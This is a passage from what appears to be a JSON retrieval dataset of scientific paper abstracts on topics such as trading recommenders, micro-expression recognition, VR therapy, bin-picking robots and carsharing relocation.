"text": "Derivative traders are usually required to scan through hundreds, even thousands of possible trades on a daily-basis; a concrete case is the so-called Mid-Curve Calendar Spread (MCCS). The actual procedure in place is full of pitfalls and a more systematic approach where more information at hand is crossed and aggregated to find good trading picks can be highly useful and undoubtedly increase the trader’s productivity. Therefore, in this work we propose an MCCS Recommendation System based on a stacking approach through Neural Networks. In order to suggest that such approach is methodologically and computationally feasible, we used a list of 15 different types of US Dollar MCCSs regarding expiration, forward and swap tenure. For each MCCS, we used 10 years of historical data ranging weekly from Sep/06 to Sep/16. Then, we started the modelling stage by: (i) fitting the base learners using as the input sensitivity metrics linked with the MCCS at time t, and its subsequent annualized returns as the output; (ii) feeding the prediction from each base model to a particular stacker; and (iii) making predictions and comparing different modelling methodologies by a set of performance metrics and benchmarks. After establishing a backtesting engine and setting performance metrics, our results suggest that our proposed Neural Network stacker compared favourably to other combination procedures.",
"title": ""
},
{
"docid": "ac559a0d26723632be3a8e7e8ecadccc",
"text": "The success of Ambient Intelligence (AmI) will depend on how secure it can be made, how privacy and other rights of individuals can be protected and how individuals can come to trust the intelligent world that surrounds them and through which they move. This article addresses these issues by analysing scenarios for ambient intelligence applications that have been developed over the last few years. It elaborates the assumptions that promotors make about the likely use of the technology and possibly unwanted side effects. It concludes with a number of threats for personal privacy that become evident. c © 2005 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "ab9f99378328dbfbec1a81ca9557b2f1",
"text": "This paper presents the results of a concurrent, nested, mixed methods exploratory study on the safety and e ectiveness of the use of a 30 lb weighted blanket with a convenience sample of 32 adults. Safety is investigated measuring blood pressure, pulse rate, and pulse oximetry, and e ectiveness by electrodermal activity (EDA), the State Trait Anxiety Inventory-10 and an exit survey. The results reveal that Brian Mullen (E-mail: Bmullen@student.umass.edu), BS, is Graduate Research Assistant, Sundar Krishnamurty (E-mail: skrishna@ecs.umass.edu), PhD, is In terim Department Head and Associate Professor, and Robert X. Gao (E-mail: Gao@ecs.umass.edu), PhD, is Professor; all are at University of MassachusettsAmherst, Department of Mechanical & Industrial Engineering–ELAB Building, 160 Governors Drive, Amherst, MA 01003 . Tina Champagne (E-mail: Tina_Champagne@cooley-dickinson.org), MEd, OTR/L, is Occupational Therapy and Group Program Supervisor, and Debra Dickson (E-mail: Debra_Dickson@cooley-dickinson.org), APRN, BC, is Behavioral Health Clinical Nurse Specialist; both are at Cooley Dickinson Hospital, Acute Inpatient Behav ioral Health Department, 30 Locust Street, Northampton, MA 01060. Address correspondence to Tina Champagne at the above address. The authors wish to acknowledge and thank the UMASS-Amherst School of Nursing for providing use of the nursing lab and vital signs monitoring equipment for the pur poses of this study and to Dr. Keli Mu for his assistance with the revisions of this paper. Occupational Therapy in Mental Health, Vol. 24(1) 2008 Available online at http://otmh.haworthpress.com © 2008 by The Haworth Press. All rights reserved. doi:10.1300/J004v24n01_05 65 the use of the 30 lb weighted blanket, in the lying down position, is safe as evidenced by the vital sign metrics. Data obtained on e ectiveness reveal 33% demonstrated lowering in EDA when using the weighted blanket, 63% reported lower anxiety after use, and 78% preferred the weighted blanket as a calming modality. The results of this study will be used to form the basis for subsequent research on the therapeutic in u ence of the weighted blanket with adults during an acute inpatient mental health admission.doi:10.1300/J004v24n01_05 [Article copies available for a fee from The Haworth Document Delivery Service: 1-800-HAWORTH. E-mail address: <docdelivery@haworthpress.com> Website: <http://www.HaworthPress. com> © 2008 by The Haworth Press. All rights reserved.]",
"title": ""
},
{
"docid": "20addc21432cf4c9f83d5768777be660",
"text": "These are the days of Growth and Innovation for a better future. Now-a-days companies are bound to realize need of Big Data to make decision over complex problem. Big Data is a term that refers to collection of large datasets containing massive amount of data whose size is in the range of Petabytes, Zettabytes, or with high rate of growth, and complexity that make them difficult to process and analyze using conventional database technologies. Big Data is generated from various sources such as social networking sites like Facebook, Twitter etc, and the data that is generated can be in various formats like structured, semi-structured or unstructured format. For extracting valuable information from this huge amount of Data, new tools and techniques is a need of time for the organizations to derive business benefits and to gain competitive advantage over the market. In this paper a comprehensive study of major Big Data emerging technologies by highlighting their important features and how they work, with a comparative study between them is presented. This paper also represents performance analysis of Apache Hive query for executing Twitter tweets in order to calculate Map Reduce CPU time spent and total time taken to finish the job.",
"title": ""
},
{
"docid": "357e09114978fc0ac1fb5838b700e6ca",
"text": "Instance level video object segmentation is an important technique for video editing and compression. To capture the temporal coherence, in this paper, we develop MaskRNN, a recurrent neural net approach which fuses in each frame the output of two deep nets for each object instance — a binary segmentation net providing a mask and a localization net providing a bounding box. Due to the recurrent component and the localization component, our method is able to take advantage of long-term temporal structures of the video data as well as rejecting outliers. We validate the proposed algorithm on three challenging benchmark datasets, the DAVIS-2016 dataset, the DAVIS-2017 dataset, and the Segtrack v2 dataset, achieving state-of-the-art performance on all of them.",
"title": ""
},
{
"docid": "4081b87cf7459679267d4ba203c4c541",
"text": "Incidental scene text spotting is considered one of the most difficult and valuable challenges in the document analysis community. Most existing methods treat text detection and recognition as separate tasks. In this work, we propose a unified end-to-end trainable Fast Oriented Text Spotting (FOTS) network for simultaneous detection and recognition, sharing computation and visual information among the two complementary tasks. Specifically, RoIRotate is introduced to share convolutional features between detection and recognition. Benefiting from convolution sharing strategy, our FOTS has little computation overhead compared to baseline text detection network, and the joint training method makes our method perform better than these two-stage methods. Experiments on ICDAR 2015, ICDAR 2017 MLT, and ICDAR 2013 datasets demonstrate that the proposed method outperforms state-of-the-art methods significantly, which further allows us to develop the first real-time oriented text spotting system which surpasses all previous state-of-the-art results by more than 5% on ICDAR 2015 text spotting task while keeping 22.6 fps.",
"title": ""
},
{
"docid": "78b8da26d1ca148b8c261c6cfdc9b2b6",
"text": "Collaborative filtering (CF) aims to build a model from users' past behaviors and/or similar decisions made by other users, and use the model to recommend items for users. Despite of the success of previous collaborative filtering approaches, they are all based on the assumption that there are sufficient rating scores available for building high-quality recommendation models. In real world applications, however, it is often difficult to collect sufficient rating scores, especially when new items are introduced into the system, which makes the recommendation task challenging. We find that there are often \" short \" texts describing features of items, based on which we can approximate the similarity of items and make recommendation together with rating scores. In this paper we \" borrow \" the idea of vector representation of words to capture the information of short texts and embed it into a matrix factorization framework. We empirically show that our approach is effective by comparing it with state-of-the-art approaches.",
"title": ""
},
{
"docid": "43db0f06e3de405657996b46047fa369",
"text": "Given two or more objects of general topology, intermediate objects are constructed by a distance field metamorphosis. In the presented method the interpolation of the distance field is guided by a warp function controlled by a set of corresponding anchor points. Some rules for defining a smooth least-distorting warp function are given. To reduce the distortion of the intermediate shapes, the warp function is decomposed into a rigid rotational part and an elastic part. The distance field interpolation method is modified so that the interpolation is done in correlation with the warp function. The method provides the animator with a technique that can be used to create a set of models forming a smooth transition between pairs of a given sequence of keyframe models. The advantage of the new approach is that it is capable of morphing between objects having a different topological genus where no correspondence between the geometric primitives of the models needs to be established. The desired correspondence is defined by an animator in terms of a relatively small number of anchor points",
"title": ""
}
] | scidocsrr |
bc021196c2f478256d62607529102dec | Micro-Expression Recognition Using Robust Principal Component Analysis and Local Spatiotemporal Directional Features | [
{
"docid": "1451c145b1ed5586755a2c89517a582f",
"text": "A robust automatic micro-expression recognition system would have broad applications in national safety, police interrogation, and clinical diagnosis. Developing such a system requires high quality databases with sufficient training samples which are currently not available. We reviewed the previously developed micro-expression databases and built an improved one (CASME II), with higher temporal resolution (200 fps) and spatial resolution (about 280×340 pixels on facial area). We elicited participants' facial expressions in a well-controlled laboratory environment and proper illumination (such as removing light flickering). Among nearly 3000 facial movements, 247 micro-expressions were selected for the database with action units (AUs) and emotions labeled. For baseline evaluation, LBP-TOP and SVM were employed respectively for feature extraction and classifier with the leave-one-subject-out cross-validation method. The best performance is 63.41% for 5-class classification.",
"title": ""
}
] | [
{
"docid": "c97ffa009af202f324a57b0a06ab1900",
"text": "Decades of research and more than 20 randomized controlled trials show that Virtual Reality exposure therapy (VRET) is effective in reducing fear and anxiety. Unfortunately, few providers or patients have had access to the costly and technical equipment previously required. Recent technological advances in the form of consumer Virtual Reality (VR) systems (e.g. Oculus Rift and Samsung Gear), however, now make widespread use of VRET in clinical settings and as self-help applications possible. In this literature review, we detail the current state of VR technology and discuss important therapeutic considerations in designing self-help and clinician-led VRETs, such as platform choice, exposure progression design, inhibitory learning strategies, stimuli tailoring, gamification, virtual social learning and more. We illustrate how these therapeutic components can be incorporated and utilized in VRET applications, taking full advantage of the unique capabilities of virtual environments, and showcase some of these features by describing the development of a consumer-ready, gamified self-help VRET application for low-cost commercially available VR hardware. We also raise and discuss challenges in the planning, development, evaluation, and dissemination of VRET applications, including the need for more high-quality research. We conclude by discussing how new technology (e.g. eye-tracking) can be incorporated into future VRETs and how widespread use of VRET self-help applications will enable collection of naturalistic \"Big Data\" that promises to inform learning theory and behavioral therapy in general.",
"title": ""
},
{
"docid": "2fc8918896f02d248597b5950fc33857",
"text": "This paper investigates the design and implementation of a finger-like robotic structure capable of reproducing human hand gestural movements performed by a multi-fingered, hand-like structure. In this work, we present a pneumatic circuit and a closed-loop controller for a finger-like soft pneumatic actuator. Experimental results demonstrate the performance of the pneumatic and control systems of the soft pneumatic actuator, and its ability to track human movement trajectories with affective content.",
"title": ""
},
{
"docid": "ca865ac35d84f0f3c4a4dec15f6c6916",
"text": "As information and communicatio n technologies become a critical component of firms’ infrastructure s and information establishe s itself as a key business resource as well asdriver,peoplestart torealisethat there is more than the functionalit y of the new information systemsthat is significant. Business or organisational transactions over new media require stability , one factor of which is information security. Information systems development practices have changed in line with the evolution of technology offerings as well as the nature of systems developed. Nevertheless , as this paper establishes , most contemporary development practices do not accommodate sufficientl y security concerns. Beyond the literature evidence, reports on empirical study results indicating that practitioners deal with security issuesbyapplyingconventional risk analysis practices after the system is developed. Addresses the lack of a defined discipline for security concerns integration in systems development by using field study results recording development practicesthatarecurrently inuseto illustratetheir deficiencies ,to point to required enhancements of practice and to propose a list of desired features that contemporary development practices should incorporate to address security concerns. This work has been supported in part by the Ministry of Development, Hellenic Secretariat for Research and Development, through programme YPER97. standards such as the Capability Maturity Model (CMM), could strengthen the initiatives of organisations for IS assurance and security. Quality certification is not directly linked to security aspects, but there are strong relating requirements for: duty separation, job descriptions and document control; and validity and availability of documentation and forms. Fillery and Chantler (1994) view this as a problematic situation and argue that lack of quality procedures and assurance in IT production is the heart of the problem and dealing with this issue is essential for embedding worthy security features in them. Information security problems in contemporary product/component-oriented development practices could be resolved in the context of quality assurance, since each single product could be validated and assured properly. The validation of products along with process assurance is the heart of the holistic proposal from Eloff and Von Solms (2000), which exploits this trend and combines both system components and system processes. The previous proposals address the importance of information security in the modern world and the need to be integrated in systems development, but still, they do not refer explicitly to the changes that need to be introduced in development practices, actors and scenarios. Furthermore, assurance of high-quality development cannot by itself ensure security, as even the perfect product could be subject of misuse. Thus, this paper sets off to address the following questions: 1 What do practitioners and developers do when they face requirements for secure systems development, how do they integrate security concerns to their development processes? And in particular: Do they, and if so how do they, implement security solutions early in the development processes? How do the implemented solutions get integrated to the overall organisational structure and everyday life of a particular organisational environment? 2 What perceptions of security do the involved IS stakeholders have? What implications do those perceptions have in the development of secure systems? Information security is a field combining technical aspects as well as social, cultural and legal/regulatory concerns. Most of the attempts to resolve security problems are focused largely upon the technological component, ignoring important contextual `̀ soft’’ parameters, enlarging in this way the gap between real world’s requirements for secure systems and the means to achieve it. Development approaches In the past the information systems’ boundaries within the organisation were quite clear and limited. As business process support tools their essence and structure were stable, confined first to automation of basic transaction processing, to explode then in a multiplicity of forms of management support tools. The basic tenets of systems development theory and practice were that systems could be produced in a specific and (in theory) standardised way, proceeding linearly through well defined stages, including a substantial programming effort, intersected by inspection and feedback milestones. The systems engineering paradigm is encapsulated in most methodologies available (Avison and Fitzgerald, 1993). Nevertheless, the `̀ profile’’ of systems development approaches has undergone fundamental changes along with the evolution of technology, as well as the nature of systems found in today’s enterprises. In essence, the traditional approach, based on the life cycle concept for a systems project, cannot capture the extensive use of commercially available application platforms as a basis for new systems development. Moreover, the vast variety of commercially available software products that can be combined to reach the required functionality for a particular system makes component-based development a realistic option. In all, systems development `̀ from scratch’’ is far less practiced compared to ten years ago. The information systems literature, in which the methodologies movement flourished in the 1980s and early 1990s, has not addressed sufficiently the new norms of practice. In this paper, we introduce a rudimentary classification of contemporary systems development practices along the well-known `̀ make or buy’’ divide. Most systems projects are now anchored on the `̀ buy’’ maxim; there we introduce two development approaches, namely single product based and componentbased development. On the `̀ make’’ side we have proprietary development. We argue that each of these three approaches introduces different challenges to developers regarding security concerns. When the IS department could not allocate the requested human resources, or its [ 184] T. Tryfonas, E. Kiountouzis and A. Poulymenakou Embedding security practices in contemporary information systems development approaches Information Management & Computer Security 9/4 [2001] 183±197 resources did not qualify in terms of experience and know-how for a specific development project, a ready-made system could have been purchased. At such times a system could be considered an accounting package and the computer in which this resided. Therefore the scope of a ready-made solution could vary from a single package to a comprehensive IS. In the case that more than one application was chosen and eventually operating, it was practically very difficult to integrate them so as to produce a unified and comprehensive organisational information management solution. The composition of the technical infrastructure was made from ready packages in whose operational philosophy should the organisation fit-in. This is a major contradiction to in-house development of a solution, which leads to systems tailored to a particular organisation’s needs and character. But contemporary development practices managed to soft-pedal this contradiction. Single-product based (or configuration) development The evolution of the technological infrastructure, the knowledge that evolved about systems development and results from the successful, or not, application of a number of ready-made systems, led to the creation and institution of basic parts of technology solutions (core systems), that, deployed with a proper configuration, could fit-in to any organisational environment (Fitzgerald, 1998). This practice, termed as single-product based development or configuration development, has led to the development of information technologies that implement a core functionality of an organisation and are customisable (can be properly configured) depending on the environment. Examples of such systems are the enterprise resource planning (ERP) systems such as the SAP, BAAN and PeopleSoft product suites. Single-product systems enable the standardisation of business processes and also facilitate the difficult task of communication of horizontal applications within a vertical sector (Vasarhelyi and Kogan, 1999). Component-based development Market requirements for successful and on-time delivered systems that can face the rapid changing contemporary business and social reality led to a second popular practice of developing systems, the component-based development. Development efforts are allocated to relatively independent sectors/ sub-systems of a manageable size that could possibly be implemented by different and topologically distributed teams. Monolithic systems are abandoned as they fail to meet the needs of modern business processes and to be delivered on time. By following this practice, one can schedule earlier the delivery of the critical system’s components and in general, all components can be arranged and scheduled to be delivered in terms of their priority (Clements, 1995). In addition, basic user requirements can be met from the beginning of the development effort, so that an organisation could take advantage of the system before this is fully implemented and deployed. This principle empowers rapid application development (RAD) practices that substitute monolithic application development with modularised, componentbased systems, the components of which have been properly evaluated by the system’s endusers and domain experts. There is a general impression that the conventional linear lifecycle of monolithic systems cannot contribute anymore to the development of successful systems and their on-time delivery (Howard et al., 1999). Proprietary development Organisations’ informational needs were defined in the past by the relatively small requirements for automation of their processes. The main objective was compute",
"title": ""
},
{
"docid": "a9dfddc3812be19de67fc4ffbc2cad77",
"text": "Many real-world problems, such as network packet routing and the coordination of autonomous vehicles, are naturally modelled as cooperative multi-agent systems. There is a great need for new reinforcement learning methods that can efficiently learn decentralised policies for such systems. To this end, we propose a new multi-agent actor-critic method called counterfactual multi-agent (COMA) policy gradients. COMA uses a centralised critic to estimate the Q-function and decentralised actors to optimise the agents’ policies. In addition, to address the challenges of multi-agent credit assignment, it uses a counterfactual baseline that marginalises out a single agent’s action, while keeping the other agents’ actions fixed. COMA also uses a critic representation that allows the counterfactual baseline to be computed efficiently in a single forward pass. We evaluate COMA in the testbed of StarCraft unit micromanagement, using a decentralised variant with significant partial observability. COMA significantly improves average performance over other multi-agent actorcritic methods in this setting, and the best performing agents are competitive with state-of-the-art centralised controllers that get access to the full state.",
"title": ""
},
{
"docid": "edeb56280e9645133b8ffbf40bcd9287",
"text": "The design, architecture and VLSI implementation of an image compression algorithm for high-frame rate, multi-view wireless endoscopy is presented. By operating directly on Bayer color filter array image the algorithm achieves both high overall energy efficiency and low implementation cost. It uses two-dimensional discrete cosine transform to decorrelate image values in each $$4\\times 4$$ 4 × 4 block. Resulting coefficients are encoded by a new low-complexity yet efficient entropy encoder. An adaptive deblocking filter on the decoder side removes blocking effects and tiling artifacts on very flat image, which enhance the final image quality. The proposed compressor, including a 4 KB FIFO, a parallel to serial converter and a forward error correction encoder, is implemented in 180 nm CMOS process. It consumes 1.32 mW at 50 frames per second (fps) and only 0.68 mW at 25 fps at 3 MHz clock. Low silicon area 1.1 mm $$\\times$$ × 1.1 mm, high energy efficiency (27 $$\\upmu$$ μ J/frame) and throughput offer excellent scalability to handle image processing tasks in new, emerging, multi-view, robotic capsules.",
"title": ""
},
{
"docid": "2a509254ce4f91646645b3eb0b745d3d",
"text": "According to attention restoration theory, directed attention can become fatigued and then be restored by spending time in a restorative environment. This study examined the restorative effects of nature on children’s executive functioning. Sevento 8-year-olds (school aged, n = 34) and 4to 5-year-olds (preschool, n = 33) participated in two sessions in which they completed an activity to fatigue attention, then walked along urban streets (urban walk) in one session and in a park-like area (nature walk) in another session, and finally completed assessments of working memory, inhibitory control, and attention. Children responded faster on the attention task after a nature walk than an urban walk. School-aged children performed significantly better on the attention task than preschoolers following the nature walk, but not urban walk. Walk type did not affect inhibitory control or verbal working memory. However, preschoolers’ spatial working memory remained more stable following the nature walk than the urban walk.",
"title": ""
},
{
"docid": "ab66d7e267072432d1015e36260c9866",
"text": "Deep Neural Networks (DNNs) are the current state of the art for various tasks such as object detection, natural language processing and semantic segmentation. These networks are massively parallel, hierarchical models with each level of hierarchy performing millions of operations on a single input. The enormous amount of parallel computation makes these DNNs suitable for custom acceleration. Custom accelerators can provide real time inference of DNNs at low power thus enabling widespread embedded deployment. In this paper, we present Snowflake, a high efficiency, low power accelerator for DNNs. Snowflake was designed to achieve optimum occupancy at low bandwidths and it is agnostic to the network architecture. Snowflake was implemented on the Xilinx Zynq XC7Z045 APSoC and achieves a peak performance of 128 G-ops/s. Snowflake is able to maintain a throughput of 98 FPS on AlexNet while averaging 1.2 GB/s of memory bandwidth.",
"title": ""
},
{
"docid": "a4a5c6b94d5b377d13b521e3dbbf0d16",
"text": "We present a large-scale dataset, ReCoRD, for machine reading comprehension requiring commonsense reasoning. Experiments on this dataset demonstrate that the performance of state-of-the-art MRC systems fall far behind human performance. ReCoRD represents a challenge for future research to bridge the gap between human and machine commonsense reading comprehension. ReCoRD is available at http://nlp.jhu.edu/record.",
"title": ""
},
{
"docid": "5f31121bf6b8412a84f8aa46763c4d40",
"text": "A novel Koch-like fractal curve is proposed to transform ultra-wideband (UWB) bow-tie into so called Koch-like sided fractal bow-tie dipole. A small isosceles triangle is cut off from center of each side of the initial isosceles triangle, then the procedure iterates along the sides like Koch curve does, forming the Koch-like fractal bow-tie geometry. The fractal bow-tie of each iterative is investigated without feedline in free space for fractal trait unveiling first, followed by detailed expansion upon the four-iterated pragmatic fractal bow-tie dipole fed by 50-Ω coaxial SMA connector through coplanar stripline (CPS) and comparison with Sierpinski gasket. The fractal bow-tie dipole can operate in multiband with moderate gain (3.5-7 dBi) and high efficiency (60%-80%), which is corresponding to certain shape parameters, such as notch ratio α, notch angle φ, and base angles θ of the isosceles triangle. Compared with conventional bow-tie dipole and Sierpinski gasket with the same size, this fractal-like antenna has almost the same operating properties in low frequency and better radiation pattern in high frequency in multi-band operation, which makes it a better candidate for applications of PCS, WLAN, WiFi, WiMAX, and other communication systems.",
"title": ""
},
{
"docid": "775cf5c9e160d8975b1652d404c590e0",
"text": "PURPOSE OF REVIEW\nWe provide an overview of the neurological condition known as visual snow syndrome. Patients affected by this chronic disorder suffer with a pan-field visual disturbance described as tiny flickering dots, which resemble the static noise of an untuned television.\n\n\nRECENT FINDINGS\nThe term 'visual snow' has only appeared in the medical literature very recently. The clinical features of the syndrome have now been reasonably described and the pathophysiology has begun to be explored. This review focuses on what is currently known about visual snow.\n\n\nSUMMARY\nRecent evidence suggests visual snow is a complex neurological syndrome characterized by debilitating visual symptoms. It is becoming better understood as it is systematically studied. Perhaps the most important unmet need for the condition is a sufficient understanding of it to generate and test hypotheses about treatment.",
"title": ""
},
{
"docid": "5b50e84437dc27f5b38b53d8613ae2c7",
"text": "We present a practical vision-based robotic bin-picking sy stem that performs detection and 3D pose estimation of objects in an unstr ctu ed bin using a novel camera design, picks up parts from the bin, and p erforms error detection and pose correction while the part is in the gri pper. Two main innovations enable our system to achieve real-time robust a nd accurate operation. First, we use a multi-flash camera that extracts rob ust depth edges. Second, we introduce an efficient shape-matching algorithm called fast directional chamfer matching (FDCM), which is used to reliabl y detect objects and estimate their poses. FDCM improves the accuracy of cham fer atching by including edge orientation. It also achieves massive improvements in matching speed using line-segment approximations of edges , a 3D distance transform, and directional integral images. We empiricall y show that these speedups, combined with the use of bounds in the spatial and h ypothesis domains, give the algorithm sublinear computational compl exity. We also apply our FDCM method to other applications in the context of deformable and articulated shape matching. In addition to significantl y improving upon the accuracy of previous chamfer matching methods in all of t he evaluated applications, FDCM is up to two orders of magnitude faster th an the previous methods.",
"title": ""
},
{
"docid": "fb15647d528df8b8613376066d9f5e68",
"text": "This article described the feature extraction methods of crop disease based on computer image processing technology in detail. Based on color, texture and shape feature extraction method in three aspects features and their respective problems were introduced start from the perspective of lesion leaves. Application research of image feature extraction in the filed of crop disease was reviewed in recent years. The results were analyzed that about feature extraction methods, and then the application of image feature extraction techniques in the future detection of crop diseases in the field of intelligent was prospected.",
"title": ""
},
{
"docid": "7346ce53235490f0eaf1ad97c7c23006",
"text": "With the growth in sociality and interaction around online news media, news sites are increasingly becoming places for communities to discuss and address common issues spurred by news articles. The quality of online news comments is of importance to news organizations that want to provide a valuable exchange of community ideas and maintain credibility within the community. In this work we examine the complex interplay between the needs and desires of news commenters with the functioning of different journalistic approaches toward managing comment quality. Drawing primarily on newsroom interviews and reader surveys, we characterize the comment discourse of SacBee.com, discuss the relationship of comment quality to both the consumption and production of news information, and provide a description of both readers' and writers' motivations for usage of news comments. We also examine newsroom strategies for dealing with comment quality as well as explore tensions and opportunities for value-sensitive innovation within such online communities.",
"title": ""
},
{
"docid": "76d1509549ba64157911e6b723f6ebc5",
"text": "A single-stage soft-switching converter is proposed for universal line voltage applications. A boost type of active-clamp circuit is used to achieve zero-voltage switching operation of the power switches. A simple DC-link voltage feedback scheme is applied to the proposed converter. A resonant voltage-doubler rectifier helps the output diodes to achieve zero-current switching operation. The reverse-recovery losses of the output diodes can be eliminated without any additional components. The DC-link capacitor voltage can be reduced, providing reduced voltage stresses of switching devices. Furthermore, power conversion efficiency can be improved by the soft-switching operation of switching devices. The performance of the proposed converter is evaluated on a 160-W (50 V/3.2 A) experimental prototype. The proposed converter complies with International Electrotechnical Commission (IEC) 1000-3-2 Class-D requirements for the light-emitting diode power supply of large-sized liquid crystal displays, maintaining the DC-link capacitor voltage within 400 V under the universal line voltage (90-265 Vrms).",
"title": ""
},
{
"docid": "3663d877d157c8ba589e4d699afc460f",
"text": "Studies of search habits reveal that people engage in many search tasks involving collaboration with others, such as travel planning, organizing social events, or working on a homework assignment. However, current Web search tools are designed for a single user, working alone. We introduce SearchTogether, a prototype that enables groups of remote users to synchronously or asynchronously collaborate when searching the Web. We describe an example usage scenario, and discuss the ways SearchTogether facilitates collaboration by supporting awareness, division of labor, and persistence. We then discuss the findings of our evaluation of SearchTogether, analyzing which aspects of its design enabled successful collaboration among study participants.",
"title": ""
},
{
"docid": "e4c2fc7244642b5858950f7c549e381e",
"text": "In this paper, we propose the Broadcasting Convolutional Network (BCN) that extracts key object features from the global field of an entire input image and recognizes their relationship with local features. BCN is a simple network module that collects effective spatial features, embeds location information and broadcasts them to the entire feature maps. We further introduce the Multi-Relational Network (multiRN) that improves the existing Relation Network (RN) by utilizing the BCN module. In pixel-based relation reasoning problems, with the help of BCN, multiRN extends the concept of ‘pairwise relations’ in conventional RNs to ‘multiwise relations’ by relating each object with multiple objects at once. This yields in O(n) complexity for n objects, which is a vast computational gain from RNs that take O(n). Through experiments, multiRN has achieved a state-of-the-art performance on CLEVR dataset, which proves the usability of BCN on relation reasoning problems.",
"title": ""
},
{
"docid": "3e113df3164468bd67060822de9a647c",
"text": "BACKGROUND\nPrevious estimates of the prevalence of geriatric depression have varied. There are few large population-based studies; most of these focused on individuals younger than 80 years. No US studies have been published since the advent of the newer antidepressant agents.\n\n\nMETHODS\nIn 1995 through 1996, as part of a large population study, we examined the current and lifetime prevalence of depressive disorders in 4,559 nondemented individuals aged 65 to 100 years. This sample represented 90% of the elderly population of Cache County, Utah. Using a modified version of the Diagnostic Interview Schedule, we ascertained past and present DSM-IV major depression, dysthymia, and subclinical depressive disorders. Medication use was determined through a structured interview and a \"medicine chest inventory.\"\n\n\nRESULTS\nPoint prevalence of major depression was estimated at 4.4% in women and 2.7% in men (P= .003). Other depressive syndromes were surprisingly uncommon (combined point prevalence, 1.6%). Among subjects with current major depression, 35.7% were taking an antidepressant (mostly selective serotonin reuptake inhibitors) and 27.4% a sedative/hypnotic. The current prevalence of major depression did not change appreciably with age. Estimated lifetime prevalence of major depression was 20.4% in women and 9.6% in men (P<.001), decreasing with age.\n\n\nCONCLUSIONS\nThese estimates for prevalence of major depression are higher than those reported previously in North American studies. Treatment with antidepressants was more common than reported previously, but was still lacking in most individuals with major depression. The prevalence of subsyndromal depressive symptoms was low, possibly because of unusual characteristics of the population.",
"title": ""
},
{
"docid": "102a97a997d0fb7f2d013434a9468e38",
"text": "Avocado plant (Persea americana), a plant belonging to the family of Lauraceae and genus, persea bears fruit known as avocado pear or alligator pear that contains the avocado pear seed. Reported uses of avocado pear seed include use in the management of hypertension, diabetes, cancer and inflammation [7-9]. The fruit is known as ube oyibo (loosely translated to ‘foreign pear’) in Ojoto and neighboring Igbo speaking communities south east Nigeria [10]. Different parts of avocado pear were used in traditional medications for various purposes including as an antimicrobial [11,12]. That not withstanding, the avocado pear seeds are essentially discarded as agro-food wastes hence underutilized. Exploring the possible dietary and therapeutic potentials of especially underutilized agro-food wastes will in addition reduce the possible environmental waste burden [1315]. Thus, this study was warranted and aimed at assessing the proximate, functional, anti-nutrients and antimicrobial properties of avocado pear seed to provide basis for its possible dietary use and justification for its ethno-medicinal use. The objectives set to achieving the study aim as stated were by determining the proximate, functional, antinutrient and antimicrobial properties of avocado pear (Persea americana) seeds using standard methods as in the study design.",
"title": ""
},
{
"docid": "87e8b5b75b5e83ebc52579e8bbae04f0",
"text": "A differential CMOS Logic family that is well suited to automated logic minimization and placement and routing techniques, yet has comparable performance to conventional CMOS, will be described. A CMOS circuit using 10,880 NMOS differential pairs has been developed using this approach.",
"title": ""
},
{
"docid": "43233ce6805a50ed931ce319245e4f6b",
"text": "Currently the use of three-phase induction machines is widespread in industrial applications due to several methods available to control the speed and torque of the motor. Many applications require that the same torque be available at all revolutions up to the nominal value. In this paper two control methods are compared: scalar control and vector control. Scalar control is a relatively simple method. The purpose of the technique is to control the magnitude of the chosen control quantities. At the induction motor the technique is used as Volts/Hertz constant control. Vector control is a more complex control technique, the evolution of which was inevitable, too, since scalar control cannot be applied for controlling systems with dynamic behaviour. The vector control technique works with vector quantities, controlling the desired values by using space phasors which contain all the three phase quantities in one phasor. It is also known as field-oriented control because in the course of implementation the identification of the field flux of the motor is required. This paper reports on the changing possibilities of the revolution – torque characteristic curve, and demonstrates the results of the two control methods with simulations. The simulations and the applied equivalent circuit parameters are based on real measurements done with no load, with direct current and with locked-rotor.",
"title": ""
}
] | scidocsrr |
7f703779ffed9562ef7af9b03fe8281a | Data Analytics for Location-Based Services: Enabling User-Based Relocation of Carsharing Vehicles | [
{
"docid": "d7eb5cc1277ed68c88a4d8222a99ccfd",
"text": "Bike-sharing systems allow people to rent a bicycle at one of many automatic rental stations scattered around the city, use them for a short journey and return them at any station in the city. A crucial factor for the success of a bikesharing system is its ability to meet the fluctuating demand for bicycles and for vacant lockers at each station. This is achieved by means of a repositioning operation, which consists of removing bicycles from some stations and transferring them to other stations, using a dedicated fleet of trucks. Operating such a fleet in a large bike-sharing system is an intricate problem consisting of decisions regarding the routes that the vehicles should follow and the number of bicycles that should be removed or placed at each station on each visit of the vehicles. In this paper, we present our modeling approach to the problem that generalizes existing routing models in the literature. This is done by introducing a unique convex objective function as well as time-related considerations. We present two mixed integer linear program formulations, discuss the assumptions associated with each, strengthen them by several valid inequalities and dominance rules, and compare their performances through an extensive numerical study. The results indicate that one of the formulations is very effective in obtaining high quality solutions to real life instances of the problem consisting of up to 104 stations and two vehicles. Finally, we draw insights on the characteristics of good solutions. T. Raviv (&) M. Tzur I. A. Forma Industrial Engineering Department, Tel Aviv University, 69978 Tel Aviv, Israel e-mail: talraviv@eng.tau.ac.il M. Tzur e-mail: tzur@eng.tau.ac.il I. A. Forma e-mail: irisforma@eng.tau.ac.il; Irisf@afeka.ac.il I. A. Forma Afeka Tel Aviv Academic College of Engineering, Bnei Efraim 218, Tel Aviv, Israel 123 EURO J Transp Logist DOI 10.1007/s13676-012-0017-6",
"title": ""
}
] | [
{
"docid": "6daa93f2a7cfaaa047ecdc04fb802479",
"text": "Facial landmark localization is important to many facial recognition and analysis tasks, such as face attributes analysis, head pose estimation, 3D face modelling, and facial expression analysis. In this paper, we propose a new approach to localizing landmarks in facial image by deep convolutional neural network (DCNN). We make two enhancements on the CNN to adapt it to the feature localization task as follows. Firstly, we replace the commonly used max pooling by depth-wise convolution to obtain better localization performance. Secondly, we define a response map for each facial points as a 2D probability map indicating the presence likelihood, and train our model with a KL divergence loss. To obtain robust localization results, our approach first takes the expectations of the response maps of Enhanced CNN and then applies auto-encoder model to the global shape vector, which is effective to rectify the outlier points by the prior global landmark configurations. The proposed ECNN method achieves 5.32% mean error on the experiments on the 300-W dataset, which is comparable to the state-of-the-art performance on this standard benchmark, showing the effectiveness of our methods.",
"title": ""
},
{
"docid": "4129881d5ff6f510f6deb23fd5b29afa",
